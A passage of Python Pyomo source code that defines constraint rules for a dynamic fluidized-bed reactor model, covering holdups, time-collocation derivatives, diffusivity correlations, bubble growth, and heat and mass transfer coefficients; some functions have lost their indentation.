                   m.Ax * m.fcw[it, jt, ix, jx] * m.delta[it, jt, ix, jx] * (1 - m.ed[it, jt, ix, jx]) * m.rhos * \
                   m.cps * m.Tsc[it, jt, ix, jx]
        else:
            return Constraint.Skip
# gas emulsion
# ce
    def nge_rule(m, it, jt, ix, jx, c):
        """Holdup definition: Nge = Ax * (1 - fcw*delta - delta) * ed * ce (emulsion gas species c)."""
        if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
            return m.Nge[it, jt, ix, jx, c] == \
                   m.Ax * (1. - m.fcw[it, jt, ix, jx] * m.delta[it, jt, ix, jx] - m.delta[it, jt, ix, jx]) * m.ed[
                       it, jt, ix, jx] * \
                   m.ce[it, jt, ix, jx, c]
        else:
            return Constraint.Skip
# Tge
    def hge_rule(m, it, jt, ix, jx):
        """Holdup definition: Hge = Ax * (1 - fcw*delta - delta) * ed * (total ce) * cpg_mol * Tge (emulsion gas enthalpy)."""
        if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
            return m.Hge[it, jt, ix, jx] == \
                   m.Ax * (1. - m.fcw[it, jt, ix, jx] * m.delta[it, jt, ix, jx] - m.delta[it, jt, ix, jx]) * m.ed[it, jt, ix, jx] * \
                   sum(m.ce[it, jt, ix, jx, kx] for kx in m.sp) * m.cpg_mol * m.Tge[it, jt, ix, jx]
        else:
            return Constraint.Skip
# solids emulsion
# ne
    def nse_rule(m, it, jt, ix, jx, c):
        """Holdup definition: Nse = Ax * (1 - fcw*delta - delta) * (1 - ed) * rhos * ne (emulsion adsorbed species c)."""
        if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
            return m.Nse[it, jt, ix, jx, c] == \
                   m.Ax * (1. - m.fcw[it, jt, ix, jx] * m.delta[it, jt, ix, jx] - m.delta[it, jt, ix, jx]) * \
                   (1. - m.ed[it, jt, ix, jx]) * m.rhos * \
                   m.ne[it, jt, ix, jx, c]
        else:
            return Constraint.Skip
# Tse
    def hse_rule(m, it, jt, ix, jx):
        """Holdup definition: Hse = Ax * (1 - fcw*delta - delta) * (1 - ed) * rhos * cps * Tse (emulsion solids enthalpy)."""
        if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
            return m.Hse[it, jt, ix, jx] == \
                   m.Ax * (1. - m.fcw[it, jt, ix, jx] * m.delta[it, jt, ix, jx] - m.delta[it, jt, ix, jx]) * \
                   (1. - m.ed[it, jt, ix, jx]) * m.rhos * \
                   m.cps * m.Tse[it, jt, ix, jx]
        else:
            return Constraint.Skip
# solids in the bed
# expr ================================================================================================
#
# Ngb
def fdvar_t_ngb(m, it, kt, ix, kx, c):
if 0 < kt <= m.ncp_t and 0 < kx <= m.ncp_x:
return m.dNgb_dt[it, kt, ix, kx, c] == \
sum(m.ldot_t[jt, kt] * m.Ngb[it, jt, ix, kx, c] for jt in m.cp_t if jt <= m.ncp_t)
else:
return Constraint.Skip
# Hgb
    def fdvar_t_hgb(m, it, kt, ix, kx):
        """Time-collocation derivative: dHgb_dt = sum_j ldot_t[j, kt] * Hgb[it, j, ...]."""
        if 0 < kt <= m.ncp_t and 0 < kx <= m.ncp_x:
            return m.dHgb_dt[it, kt, ix, kx] == \
                   sum(m.ldot_t[jt, kt] * m.Hgb[it, jt, ix, kx] for jt in m.cp_t if jt <= m.ncp_t)
        else:
            return Constraint.Skip
# Ngc
    def fdvar_t_ngc(m, it, kt, ix, kx, c):
        """Time-collocation derivative: dNgc_dt = sum_j ldot_t[j, kt] * Ngc[it, j, ...]."""
        if 0 < kt <= m.ncp_t and 0 < kx <= m.ncp_x:
            return m.dNgc_dt[it, kt, ix, kx, c] == \
                   sum(m.ldot_t[jt, kt] * m.Ngc[it, jt, ix, kx, c] for jt in m.cp_t if jt <= m.ncp_t)
        else:
            return Constraint.Skip
# Hgc
    def fdvar_t_hgc(m, it, kt, ix, kx):
        """Time-collocation derivative: dHgc_dt = sum_j ldot_t[j, kt] * Hgc[it, j, ...]."""
        if 0 < kt <= m.ncp_t and 0 < kx <= m.ncp_x:
            return m.dHgc_dt[it, kt, ix, kx] == \
                   sum(m.ldot_t[jt, kt] * m.Hgc[it, jt, ix, kx] for jt in m.cp_t if jt <= m.ncp_t)
        else:
            return Constraint.Skip
# Nsc
    def fdvar_t_nsc(m, it, kt, ix, kx, c):
        """Time-collocation derivative: dNsc_dt = sum_j ldot_t[j, kt] * Nsc[it, j, ...]."""
        if 0 < kt <= m.ncp_t and 0 < kx <= m.ncp_x:
            return m.dNsc_dt[it, kt, ix, kx, c] == \
                   sum(m.ldot_t[jt, kt] * m.Nsc[it, jt, ix, kx, c] for jt in m.cp_t if jt <= m.ncp_t)
        else:
            return Constraint.Skip
# Hsc
    def fdvar_t_hsc(m, it, kt, ix, kx):
        """Time-collocation derivative: dHsc_dt = sum_j ldot_t[j, kt] * Hsc[it, j, ...]."""
        if 0 < kt <= m.ncp_t and 0 < kx <= m.ncp_x:
            return m.dHsc_dt[it, kt, ix, kx] == \
                   sum(m.ldot_t[jt, kt] * m.Hsc[it, jt, ix, kx] for jt in m.cp_t if jt <= m.ncp_t)
        else:
            return Constraint.Skip
# Nge
    def fdvar_t_nge(m, it, kt, ix, kx, c):
        """Time-collocation derivative: dNge_dt = sum_j ldot_t[j, kt] * Nge[it, j, ...]."""
        if 0 < kt <= m.ncp_t and 0 < kx <= m.ncp_x:
            return m.dNge_dt[it, kt, ix, kx, c] == \
                   sum(m.ldot_t[jt, kt] * m.Nge[it, jt, ix, kx, c] for jt in m.cp_t if jt <= m.ncp_t)
        else:
            return Constraint.Skip
# Hge
    def fdvar_t_hge(m, it, kt, ix, kx):
        """Time-collocation derivative: dHge_dt = sum_j ldot_t[j, kt] * Hge[it, j, ...]."""
        if 0 < kt <= m.ncp_t and 0 < kx <= m.ncp_x:
            return m.dHge_dt[it, kt, ix, kx] == \
                   sum(m.ldot_t[jt, kt] * m.Hge[it, jt, ix, kx] for jt in m.cp_t if jt <= m.ncp_t)
        else:
            return Constraint.Skip
# Nse
    def fdvar_t_nse(m, it, kt, ix, kx, c):
        """Time-collocation derivative: dNse_dt = sum_j ldot_t[j, kt] * Nse[it, j, ...]."""
        if 0 < kt <= m.ncp_t and 0 < kx <= m.ncp_x:
            return m.dNse_dt[it, kt, ix, kx, c] == \
                   sum(m.ldot_t[jt, kt] * m.Nse[it, jt, ix, kx, c] for jt in m.cp_t if jt <= m.ncp_t)
        else:
            return Constraint.Skip
# Hse
    def fdvar_t_hse(m, it, kt, ix, kx):
        """Time-collocation derivative: dHse_dt = sum_j ldot_t[j, kt] * Hse[it, j, ...]."""
        if 0 < kt <= m.ncp_t and 0 < kx <= m.ncp_x:
            return m.dHse_dt[it, kt, ix, kx] == \
                   sum(m.ldot_t[jt, kt] * m.Hse[it, jt, ix, kx] for jt in m.cp_t if jt <= m.ncp_t)
        else:
            return Constraint.Skip
# expr ================================================================================================
# Ngbi0
def fcp_t_ngb(m, it, ix, kx, c):
if it < m.nfe_t and 0 < kx <= m.ncp_x:
return m.Ngb[it + 1, 0, ix, kx, c] - \
sum(m.l1_t[jt] * m.Ngb[it, jt, ix, kx, c] for jt in m.cp_t if jt <= m.ncp_t)
else:
return Expression.Skip
# Hgbi0
    def fcp_t_hgb(m, it, ix, kx):
        """Continuity residual (Expression): Hgb[it+1, 0] minus its l1_t extrapolation from element it."""
        if it < m.nfe_t and 0 < kx <= m.ncp_x:
            return m.Hgb[it + 1, 0, ix, kx] - \
                   sum(m.l1_t[jt] * m.Hgb[it, jt, ix, kx] for jt in m.cp_t if jt <= m.ncp_t)
        else:
            return Expression.Skip
# Ngci0
    def fcp_t_ngc(m, it, ix, kx, c):
        """Continuity residual (Expression): Ngc[it+1, 0] minus its l1_t extrapolation from element it."""
        if it < m.nfe_t and 0 < kx <= m.ncp_x:
            return m.Ngc[it + 1, 0, ix, kx, c] - \
                   sum(m.l1_t[jt] * m.Ngc[it, jt, ix, kx, c] for jt in m.cp_t if jt <= m.ncp_t)
        else:
            return Expression.Skip
# Hgci0
    def fcp_t_hgc(m, it, ix, kx):
        """Continuity residual (Expression): Hgc[it+1, 0] minus its l1_t extrapolation from element it."""
        if it < m.nfe_t and 0 < kx <= m.ncp_x:
            return m.Hgc[it + 1, 0, ix, kx] - \
                   sum(m.l1_t[jt] * m.Hgc[it, jt, ix, kx] for jt in m.cp_t if jt <= m.ncp_t)
        else:
            return Expression.Skip
    # Nsci0
    def fcp_t_nsc(m, it, ix, kx, c):
        """Continuity residual (Expression): Nsc[it+1, 0] minus its l1_t extrapolation from element it."""
        if it < m.nfe_t and 0 < kx <= m.ncp_x:
            return m.Nsc[it + 1, 0, ix, kx, c] - \
                   sum(m.l1_t[jt] * m.Nsc[it, jt, ix, kx, c] for jt in m.cp_t if jt <= m.ncp_t)
        else:
            return Expression.Skip
    # Hsci0
    def fcp_t_hsc(m, it, ix, kx):
        """Continuity residual (Expression): Hsc[it+1, 0] minus its l1_t extrapolation from element it."""
        if it < m.nfe_t and 0 < kx <= m.ncp_x:
            return m.Hsc[it + 1, 0, ix, kx] - \
                   sum(m.l1_t[jt] * m.Hsc[it, jt, ix, kx] for jt in m.cp_t if jt <= m.ncp_t)
        else:
            return Expression.Skip
# Ngei0
    def fcp_t_nge(m, it, ix, kx, c):
        """Continuity residual (Expression): Nge[it+1, 0] minus its l1_t extrapolation from element it."""
        if it < m.nfe_t and 0 < kx <= m.ncp_x:
            return m.Nge[it + 1, 0, ix, kx, c] - \
                   sum(m.l1_t[jt] * m.Nge[it, jt, ix, kx, c] for jt in m.cp_t if jt <= m.ncp_t)
        else:
            return Expression.Skip
# Hgei0
    def fcp_t_hge(m, it, ix, kx):
        """Continuity residual (Expression): Hge[it+1, 0] minus its l1_t extrapolation from element it."""
        if it < m.nfe_t and 0 < kx <= m.ncp_x:
            return m.Hge[it + 1, 0, ix, kx] - \
                   sum(m.l1_t[jt] * m.Hge[it, jt, ix, kx] for jt in m.cp_t if jt <= m.ncp_t)
        else:
            return Expression.Skip
# Nsei0
    def fcp_t_nse(m, it, ix, kx, c):
        """Continuity residual (Expression): Nse[it+1, 0] minus its l1_t extrapolation from element it."""
        if it < m.nfe_t and 0 < kx <= m.ncp_x:
            return m.Nse[it + 1, 0, ix, kx, c] - \
                   sum(m.l1_t[jt] * m.Nse[it, jt, ix, kx, c] for jt in m.cp_t if jt <= m.ncp_t)
        else:
            return Expression.Skip
# Hsei0
    def fcp_t_hse(m, it, ix, kx):
        """Continuity residual (Expression): Hse[it+1, 0] minus its l1_t extrapolation from element it."""
        if it < m.nfe_t and 0 < kx <= m.ncp_x:
            return m.Hse[it + 1, 0, ix, kx] - \
                   sum(m.l1_t[jt] * m.Hse[it, jt, ix, kx] for jt in m.cp_t if jt <= m.ncp_t)
        else:
            return Expression.Skip
# vg
# def a1_rule(m, it, jt, ix, jx):
    def Gb_rule(m, it, jt, ix, jx):
        """Bubble gas flow definition: vg * Ax * (total cb) = Gb."""
        if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
            return m.vg[it, jt, ix, jx] * m.Ax * sum(m.cb[it, jt, ix, jx, kx] for kx in m.sp) == m.Gb[it, jt, ix, jx]
        else:
            return Constraint.Skip
# hsc
def a4_rule(m, it, jt, ix, jx):
if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
return m.ecwin[it, jt, ix, jx] == m.Jc[it, jt, ix, jx] * m.hsc[it, jt, ix, jx]
else:
return Constraint.Skip
# hse
    def a5_rule(m, it, jt, ix, jx):
        """Emulsion solids enthalpy inflow: eein = Je * hse."""
        if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
            return m.eein[it, jt, ix, jx] == m.Je[it, jt, ix, jx] * m.hse[it, jt, ix, jx]
        else:
            return Constraint.Skip
# nc
    def a8_rule(m, it, jt, ix, jx, k):
        """Cloud-wake adsorbed-species inflow: ccwin[k] = Jc * nc[k]."""
        if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
            return m.ccwin[it, jt, ix, jx, k] == m.Jc[it, jt, ix, jx] * m.nc[it, jt, ix, jx, k]
        else:
            return Constraint.Skip
# ne
    def a9_rule(m, it, jt, ix, jx, k):
        """Emulsion adsorbed-species inflow: cein[k] = Je * ne[k]."""
        if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
            return m.cein[it, jt, ix, jx, k] == m.Je[it, jt, ix, jx] * m.ne[it, jt, ix, jx, k]
        else:
            return Constraint.Skip
# Je
def a11_rule_2(m, it, jt, ix, jx):
if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
return m.z[it, jt, ix, jx] == m.Je[it, jt, ix, jx] - m.Jc[it, jt, ix, jx]
else:
return Constraint.Skip
# delta
    def a13_rule(m, it, jt, ix, jx):
        """Bubble-phase flow split: Gb = vb * Ax * delta * (total cb)."""
        if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
            return m.Gb[it, jt, ix, jx] == m.vb[it, jt, ix, jx] * m.Ax * m.delta[it, jt, ix, jx] * sum(m.cb[it, jt, ix, jx, kx] for kx in m.sp)
        else:
            return Constraint.Skip
# Jc
    def a14_rule(m, it, jt, ix, jx):
        """Wake-induced solids circulation flux: Jc = fw * delta * rhos * (1 - ed) * vb."""
        if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
            return m.Jc[it, jt, ix, jx] == \
                   m.fw * m.delta[it, jt, ix, jx] * m.rhos * (1 - m.ed[it, jt, ix, jx]) * m.vb[it, jt, ix, jx]
        else:
            return Constraint.Skip
# yb
    def a15_rule(m, it, jt, ix, jx, k):
        """Bubble-phase mole fraction: cb[k] = yb[k] * (total cb)."""
        if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
            return m.cb[it, jt, ix, jx, k] == m.yb[it, jt, ix, jx, k] * sum(m.cb[it, jt, ix, jx, kx] for kx in m.sp)
        else:
            return Constraint.Skip
# yc
    def a16_rule(m, it, jt, ix, jx, k):
        """Cloud-wake mole fraction: cc[k] = yc[k] * (total cc)."""
        if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
            return m.cc[it, jt, ix, jx, k] == m.yc[it, jt, ix, jx, k] * sum(m.cc[it, jt, ix, jx, kx] for kx in m.sp)
        else:
            return Constraint.Skip
# ye
    def a17_rule(m, it, jt, ix, jx, k):
        """Emulsion mole fraction: ce[k] = ye[k] * (total ce)."""
        if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
            return m.ce[it, jt, ix, jx, k] == m.ye[it, jt, ix, jx, k] * sum(m.ce[it, jt, ix, jx, kx] for kx in m.sp)
        else:
            return Constraint.Skip
# D 'c'
    def a22_rule(m, it, jt, ix, jx):
        """Diffusivity of species 'c': mole-fraction-weighted blend of two polynomial fits in P (bar, offset 1.4)
        and Tge (offset 60 C); weights come from the 'h'/'n' emulsion mole fractions."""
        if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
            return m.D[it, jt, ix, jx, 'c'] == \
                   (0.1593 - 0.1282 * (m.P[it, jt, ix, jx] - 1.4) + 0.001 * (m.Tge[it, jt, ix, jx] - 60 - 273.16) + 0.0964 * (
                       (m.P[it, jt, ix, jx] - 1.4) ** 2) - 0.0006921 * (
                        (m.P[it, jt, ix, jx] - 1.4) * (m.Tge[it, jt, ix, jx] - 60 - 273.16)) -
                    3.3532e-06 * (m.Tge[it, jt, ix, jx] - 60 - 273.16) ** 2) * m.ye[it, jt, ix, jx, 'h'] / (
                       m.ye[it, jt, ix, jx, 'h'] + m.ye[it, jt, ix, jx, 'n']) + \
                   (
                   0.1495 - 0.1204 * (m.P[it, jt, ix, jx] - 1.4) + 0.0008896 * (m.Tge[it, jt, ix, jx] - 60 - 273.16) + 0.0906 * (
                       (m.P[it, jt, ix, jx] - 1.4) ** 2) -
                   0.0005857 * (m.P[it, jt, ix, jx] - 1.4) * (m.Tge[it, jt, ix, jx] - 60 - 273.16) -
                   3.559e-06 * (m.Tge[it, jt, ix, jx] - 60 - 273.16) ** 2) * m.ye[it, jt, ix, jx, 'n'] / (
                       m.ye[it, jt, ix, jx, 'h'] + m.ye[it, jt, ix, jx, 'n'])
        else:
            return Constraint.Skip
# D 'h'
    def a23_rule(m, it, jt, ix, jx):
        """Diffusivity of species 'h': same polynomial-fit blend as a22, weighted by the 'c'/'n' emulsion mole fractions."""
        if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
            return m.D[it, jt, ix, jx, 'h'] == \
                   (0.1593 - 0.1282 * (m.P[it, jt, ix, jx] - 1.4) + 0.001 * (m.Tge[it, jt, ix, jx] - 60 - 273.16) +
                    0.0964 * ((m.P[it, jt, ix, jx] - 1.4) ** 2) - 0.0006921 * (
                        (m.P[it, jt, ix, jx] - 1.4) * (m.Tge[it, jt, ix, jx] - 60 - 273.16)) -
                    3.3532e-06 * (m.Tge[it, jt, ix, jx] - 60 - 273.16) ** 2) * m.ye[it, jt, ix, jx, 'c'] / (
                       m.ye[it, jt, ix, jx, 'c'] + m.ye[it, jt, ix, jx, 'n']) + \
                   (
                   0.2165 - 0.1743 * (m.P[it, jt, ix, jx] - 1.4) + 0.001377 * (m.Tge[it, jt, ix, jx] - 60 - 273.16) + 0.13109 * (
                       (m.P[it, jt, ix, jx] - 1.4) ** 2) -
                   0.0009115 * (m.P[it, jt, ix, jx] - 1.4) * (m.Tge[it, jt, ix, jx] - 60 - 273.16) -
                   4.8394e-06 * (m.Tge[it, jt, ix, jx] - 60 - 273.16) ** 2) * m.ye[it, jt, ix, jx, 'n'] / (
                       m.ye[it, jt, ix, jx, 'c'] + m.ye[it, jt, ix, jx, 'n'])
        else:
            return Constraint.Skip
# D 'n'
    def a24_rule(m, it, jt, ix, jx):
        """Diffusivity of species 'n': same polynomial-fit blend as a22/a23, weighted by the 'c'/'h' emulsion mole fractions."""
        if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
            return m.D[it, jt, ix, jx, 'n'] == \
                   (
                   0.1495 - 0.1204 * (m.P[it, jt, ix, jx] - 1.4) + 0.0008896 * (m.Tge[it, jt, ix, jx] - 60 - 273.16) + 0.0906 * (
                       (m.P[it, jt, ix, jx] - 1.4) ** 2) -
                   0.0005857 * (m.P[it, jt, ix, jx] - 1.4) * (m.Tge[it, jt, ix, jx] - 60 - 273.16) -
                   3.559e-06 * (m.Tge[it, jt, ix, jx] - 60 - 273.16) ** 2) * m.ye[it, jt, ix, jx, 'c'] / (
                       m.ye[it, jt, ix, jx, 'h'] + m.ye[it, jt, ix, jx, 'c']) + \
                   (
                   0.2165 - 0.1743 * (m.P[it, jt, ix, jx] - 1.4) + 0.001377 * (m.Tge[it, jt, ix, jx] - 60 - 273.16) + 0.13109 * (
                       (m.P[it, jt, ix, jx] - 1.4) ** 2) -
                   0.0009115 * (m.P[it, jt, ix, jx] - 1.4) * (m.Tge[it, jt, ix, jx] - 60 - 273.16) -
                   4.8394e-06 * (m.Tge[it, jt, ix, jx] - 60 - 273.16) ** 2) * m.ye[it, jt, ix, jx, 'h'] / (
                       m.ye[it, jt, ix, jx, 'h'] + m.ye[it, jt, ix, jx, 'c'])
        else:
            return Constraint.Skip
# rhog
    def a25_rule(m, it, jt, ix, jx):
        """Ideal-gas density: rhog = P*100 * (mixture molar mass from ye and the 44.01/28.01/18.02 weights) / (R*Tge)."""
        if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
            return m.rhog[it, jt, ix, jx] == m.P[it, jt, ix, jx] * 100 * (
                m.ye[it, jt, ix, jx, 'c'] * 44.01 + m.ye[it, jt, ix, jx, 'n'] * 28.01 + m.ye[
                    it, jt, ix, jx, 'h'] * 18.02) \
                                             / (8.314 * (m.Tge[it, jt, ix, jx]))
        else:
            return Constraint.Skip
# Ar
    def a26_rule(m, it, jt, ix, jx):
        """Archimedes number: Ar = dp^3 * rhog * (rhos - rhog) * gc / mug^2."""
        if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
            return m.Ar[it, jt, ix, jx] == \
                   (m.dp ** 3) * m.rhog[it, jt, ix, jx] * (m.rhos - m.rhog[it, jt, ix, jx]) * m.gc / (m.mug ** 2)
        else:
            return Constraint.Skip
# e
def a27_rule(m, it, jt, ix, jx):
if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
return (1 - m.e[it, jt, ix, jx]) == (1 - m.ed[it, jt, ix, jx]) * (1 - m.delta[it, jt, ix, jx])
else:
return Constraint.Skip
# vbr
    def a28_rule(m, it, jt, ix, jx):
        """Single-bubble rise velocity: vbr = 0.711 * sqrt(gc * db)."""
        if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
            return m.vbr[it, jt, ix, jx] == 0.711 * sqrt(m.gc * m.db[it, jt, ix, jx])
        else:
            return Constraint.Skip
# db0 approx
    def a29_rule(m, it, jt):
        """Initial bubble diameter approximation: db0 = 1.38 * gc^-0.2 * ((vg - ve) * Ao)^0.4,
        evaluated at the inlet point (ix=1, jx=1).  NOTE(review): Ao is presumably the
        distributor/orifice area parameter — confirm against its declaration."""
        if 0 < jt <= m.ncp_t:
            return m.db0[it, jt] == 1.38 * (m.gc ** (-0.2)) * ((m.vg[it, jt, 1, 1] - m.ve[it, jt, 1, 1]) * m.Ao) ** 0.4
        else:
            return Constraint.Skip
# dbe
    def a30_rule(m, it, jt, ix, jx):
        """Equilibrium bubble diameter: dbe = (Dt/4) * (-g1 + g3)^2."""
        if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
            return m.dbe[it, jt, ix, jx] == (m.Dt / 4) * (-m.g1[it, jt] + m.g3[it, jt, ix, jx]) ** 2
        else:
            return Constraint.Skip
# dbm
    def a31_rule(m, it, jt, ix, jx):
        """Maximum bubble diameter: dbm = 2.59 * gc^-0.2 * ((vg - ve) * Ax)^0.4."""
        if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
            return m.dbm[it, jt, ix, jx] == 2.59 * (m.gc ** (-0.2)) * ((m.vg[it, jt, ix, jx] - m.ve[it, jt, ix, jx]) * m.Ax) ** 0.4
        else:
            return Constraint.Skip
# g1
    def a32_rule(m, it, jt):
        """Bubble-growth coefficient g1 = 2.56e-2 * sqrt(Dt/gc) / vmf (time-indexed only)."""
        if 0 < jt <= m.ncp_t:
            return m.g1[it, jt] == 2.56E-2 * sqrt(m.Dt / m.gc) / m.vmf[it, jt]
        else:
            return Constraint.Skip
# g2
    def a33_rule(m, it, jt, ix, jx):
        """Bubble-growth coefficient: 4*g2 = Dt * (g1 + g3)^2."""
        if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
            return 4 * m.g2[it, jt, ix, jx] == m.Dt * (m.g1[it, jt] + m.g3[it, jt, ix, jx]) ** 2
        else:
            return Constraint.Skip
# g3
    def a34_rule(m, it, jt, ix, jx):
        """Bubble-growth coefficient: g3 = sqrt(g1^2 + 4*dbm/Dt)."""
        if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
            return m.g3[it, jt, ix, jx] == sqrt(m.g1[it, jt] ** 2 + 4 * m.dbm[it, jt, ix, jx] / m.Dt)
        else:
            return Constraint.Skip
# x included?
# dbu
    def a35_rule(m, it, jt, ix, jx):
        """Implicit bubble-diameter profile dbu(l): exponential axial growth law written with
        sqrt-ratio terms raised to (1 -/+ g1/g3); l[ix, jx] is the axial position."""
        if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
            return exp(0.3 * (m.l[ix, jx]) / m.Dt) * \
                   (((sqrt(m.dbu[it, jt, ix, jx]) - sqrt(m.dbe[it, jt, ix, jx])) / (sqrt(m.db0[it, jt]) - sqrt(m.dbe[it, jt, ix, jx]))) ** (1 - m.g1[it, jt] / m.g3[it, jt, ix, jx])) == \
                   (((sqrt(m.dbu[it, jt, ix, jx]) - sqrt(m.g2[it, jt, ix, jx])) / (sqrt(m.db0[it, jt]) - sqrt(m.g2[it, jt, ix, jx]))) ** -(1 + m.g1[it, jt] / m.g3[it, jt, ix, jx]))
        else:
            return Constraint.Skip
# fc
    def a36_rule(m, it, jt, ix, jx):
        """Cloud fraction: fc = 3*(vmf/emf) / (vbr - vmf/emf)."""
        if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
            return m.fc[it, jt, ix, jx] == 3. * (m.vmf[it, jt] / m.emf) / (m.vbr[it, jt, ix, jx] - (m.vmf[it, jt] / m.emf))
        else:
            return Constraint.Skip
# fcw
def a37_rule(m, it, jt, ix, jx):
if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
return m.fcw[it, jt, ix, jx] == m.fc[it, jt, ix, jx] + m.fw
else:
return Constraint.Skip
# Kbc
    def a38_rule(m, it, jt, ix, jx, k):
        """Bubble-to-cloud mass transfer coefficient: Kbc = 1.32*4.5*vmf/db + 5.85*sqrt(D*1e-4)*gc^0.25/db^(5/4)."""
        if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
            return m.Kbc[it, jt, ix, jx, k] == \
                   1.32 * 4.5 * (m.vmf[it, jt] / m.db[it, jt, ix, jx]) + 5.85 * (
                       ((m.D[it, jt, ix, jx, k] * 1E-4) ** 0.5) * (m.gc ** 0.25) / (m.db[it, jt, ix, jx] ** (5 / 4)))
        else:
            return Constraint.Skip
# Kce
    def a39_rule(m, it, jt, ix, jx, k):
        """Cloud-to-emulsion mass transfer coefficient: Kce = 6.77 * sqrt(ed * D*1e-4 * vbr / db^3)."""
        if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
            return m.Kce[it, jt, ix, jx, k] == 6.77 * sqrt(
                m.ed[it, jt, ix, jx] * (m.D[it, jt, ix, jx, k] * 1E-4) * m.vbr[it, jt, ix, jx] / (
                    m.db[it, jt, ix, jx] ** 3))
        else:
            return Constraint.Skip
# Kcebs
    def a40_rule(m, it, jt, ix, jx):
        """Cloud-emulsion solids exchange coefficient: Kcebs = 3*(1-ed) / ((1-delta)*ed) * (ve/db)."""
        if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
            return m.Kcebs[it, jt, ix, jx] == \
                   3 * (1 - m.ed[it, jt, ix, jx]) / ((1 - m.delta[it, jt, ix, jx]) * m.ed[it, jt, ix, jx]) * (m.ve[it, jt, ix, jx] / m.db[it, jt, ix, jx])
        else:
            return Constraint.Skip
# Hbc
    def a41_rule(m, it, jt, ix, jx):
        """Bubble-to-cloud heat transfer coefficient Hbc: convective term (1.32*4.5*vmf*c*cp/db)
        plus conductive term (5.85*sqrt(kg/1000*c*cp)*gc^0.25/db^(5/4))."""
        if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
            return m.Hbc[it, jt, ix, jx] == 1.32 * 4.5 * m.vmf[it, jt] * sum(m.cb[it, jt, ix, jx, kx] for kx in m.sp) * m.cpg_mol / m.db[it, jt, ix, jx] + \
                   5.85 * sqrt((m.kg / 1000) * sum(m.cb[it, jt, ix, jx, kx] for kx in m.sp) * m.cpg_mol) * (m.gc ** 0.25) / (m.db[it, jt, ix, jx] ** (5 / 4))
        else:
            return Constraint.Skip
# Hce
    def a42_rule(m, it, jt, ix, jx):
        """Cloud-to-emulsion heat transfer coefficient: Hce = 6.78 * sqrt(ed*vb*(kg/1000)*(total cc)*cpg_mol/db^3)."""
        if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
            return m.Hce[it, jt, ix, jx] == 6.78 * sqrt(
                m.ed[it, jt, ix, jx] * m.vb[it, jt, ix, jx] * (m.kg / 1000) * sum(m.cc[it, jt, ix, jx, kx] for kx in m.sp) * m.cpg_mol / (m.db[it, jt, ix, jx] ** 3))
        else:
            return Constraint.Skip
# hp
    def a43_rule(m, it, jt, ix, jx):
        """Particle Nusselt number definition: Nup = 1000 * hp * dp / kg."""
        if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
            return m.Nup[it, jt, ix, jx] == 1000 * m.hp[it, jt, ix, jx] * m.dp / m.kg
        else:
            return Constraint.Skip
    # Red
    def a44_rule(m, it, jt, ix, jx):
        """Particle Reynolds number: Red = ve * dp * rhog / mug."""
        if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
            return m.Red[it, jt, ix, jx] == m.ve[it, jt, ix, jx] * m.dp * m.rhog[it, jt, ix, jx] / m.mug
        else:
            return Constraint.Skip
# Nup
def a45_rule(m, it, jt, ix, jx):
if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
return m.Nup[it, jt, ix, jx] == 0.03 * (m.Red[it, jt, ix, jx] ** 1.3)
else:
return Constraint.Skip
# kpa
    def a46_rule(m, it, jt, ix, jx):
        """Packet thermal conductivity: kpa = (3.58 - 2.5*ed) * kg * (kp/kg)^(0.46 - 0.46*ed)."""
        if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
            return m.kpa[it, jt, ix, jx] == \
                   (3.58 - 2.5 * m.ed[it, jt, ix, jx]) * m.kg * ((m.kp / m.kg) ** (0.46 - 0.46 * m.ed[it, jt, ix, jx]))
        else:
            return Constraint.Skip
# fn
    def a47_rule(m, it, jt, ix, jx):
        """Fluidization number: fn = vg / vmf."""
        if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
            return m.fn[it, jt, ix, jx] == m.vg[it, jt, ix, jx] / m.vmf[it, jt]
        else:
            return Constraint.Skip
# tau
    def a48_rule(m, it, jt, ix, jx):
        """Packet residence time at tube surface: tau = 0.44 * (dp*gc/(vmf^2*(fn-ah)^2))^0.14 * (dp/dx)^0.225."""
        if 0 < jt <= m.ncp_t and 0 < jx <= m.ncp_x:
            return m.tau[it, jt, ix, jx] == 0.44 * (
                (m.dp * m.gc / ((m.vmf[it, jt] ** 2) * ((m.fn[it, jt, ix, jx] - m.ah) ** 2))) ** 0.14) * (
